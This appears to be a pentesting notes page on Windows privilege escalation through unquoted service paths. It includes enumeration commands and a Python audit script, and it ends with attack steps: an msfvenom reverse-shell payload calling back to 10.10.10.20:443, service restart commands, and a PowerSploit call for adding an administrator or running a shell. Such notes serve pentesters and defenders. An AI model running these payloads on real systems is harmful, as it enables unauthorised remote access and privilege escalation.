Hack$Notes

Unquoted Service Path

Search for Unquoted Path

The following commands search for auto-start services whose executable path is unquoted, excluding anything under "C:\windows", since a normal user will not have the permissions needed on that folder.

##  Windows Management Instrumentation Command-Line (WMIC)  ##
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

##  WMI (Powershell) ##
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List

If a service with an unquoted path is found, check the permissions on the folders along that path with icacls. If we have permissions on any of the folders that lead to the executable, we can escalate our privileges.
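To make the check above concrete, here is an added example (not part of the original notes) that reproduces the commonly documented rule Windows applies to an unquoted service path containing spaces: each prefix ending at a space is tried as an executable, with .exe appended, before the intended binary is reached. Given wmic output it lists the probe order for each at-risk auto-start service and the directories whose ACLs need to be inspected with icacls. The sample wmic table is constructed, the service names and paths are invented, and the parser assumes wmic's default table format separates columns with two or more spaces.

```python
"""Audit `wmic service get name,displayname,pathname,startmode` output for
unquoted service paths.

Added example, not part of the original notes. For an unquoted PathName
with spaces, Windows tries each prefix ending at a space as an executable
(with .exe appended) before reaching the real binary; the parent directory
of each such prefix is a location whose ACL must be checked with icacls.
"""
import ntpath
import re

# Constructed sample of wmic output; service names and paths are invented.
# Columns are separated by two or more spaces, as wmic's default table
# format pads them (an assumption this parser relies on).
SAMPLE_WMIC = r"""
Name         DisplayName        PathName                                            StartMode
Spooler      Print Spooler      C:\Windows\System32\spoolsv.exe                     Auto
ExampleSvc   Example Service    C:\Program Files\Example App\bin\svc.exe            Auto
QuotedSvc    Quoted Service     "C:\Program Files\Quoted App\quoted.exe" -run       Auto
ArgSvc       Args Service       C:\Tools\Some Tool\tool.exe -config main.cfg        Auto
ManualSvc    Manual Service     C:\Tools\Other Tool\other.exe                       Manual
"""


def parse_wmic_table(text):
    """Turn wmic's padded table into a list of dicts keyed by column name."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    rows = []
    for line in lines[1:]:
        fields = re.split(r"\s{2,}", line.strip())
        rows.append(dict(zip(header, fields)))
    return rows


def candidate_paths(pathname):
    """Executables Windows would try, in order, for an unquoted path with
    spaces. Quoted paths and paths without spaces return [] (not at risk)."""
    pathname = pathname.strip()
    if pathname.startswith('"') or " " not in pathname:
        return []
    parts = pathname.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            # The real binary; anything after it is service arguments.
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def audit(wmic_text, skip_windows_dir=True):
    """Flag Auto-start services whose PathName is unquoted and contains
    spaces, mirroring the filters in the wmic one-liner from the notes."""
    findings = []
    for row in parse_wmic_table(wmic_text):
        path = row.get("PathName", "")
        if row.get("StartMode", "").lower() != "auto":
            continue
        if skip_windows_dir and path.lower().startswith("c:\\windows\\"):
            continue
        probes = candidate_paths(path)
        if not probes:
            continue
        # Parent directory of every probe, shortest (closest to root) first.
        dirs = sorted({ntpath.dirname(p) for p in probes}, key=str.lower)
        findings.append({
            "service": row.get("Name", ""),
            "path": path,
            "probe_order": probes,
            "dirs_to_check": dirs,
        })
    return findings


def icacls_commands(finding):
    """icacls invocations for the directories a finding points at."""
    return ['icacls "%s"' % d for d in finding["dirs_to_check"]]


if __name__ == "__main__":
    for f in audit(SAMPLE_WMIC):
        print("%s: %s" % (f["service"], f["path"]))
        for p in f["probe_order"]:
            print("    probes ", p)
        for cmd in icacls_commands(f):
            print("    check  ", cmd)
```

To run it against a real host, redirect the wmic command to a file (wmic writes UTF-16 when redirected, so read it with `encoding="utf-16"`) and pass the text to `audit()`. Any flagged directory where non-administrators can create files is the defect to fix: quote the service's binPath and tighten the directory ACL.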

Create an executable msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.20 LPORT=443 -f exe > /root/same_service_name_as_above.exe

Replace and restart service.

sc stop service_name
sc start service_name

Powersploit

Within PowerShell run the following.

# Find them
Get-ServiceUnquoted

# Execute a reverse shell or add a new user as administrator.
Write-ServiceBinary -name "Service_Name" -Path "C:\Service_name.exe"

Last updated 1 year ago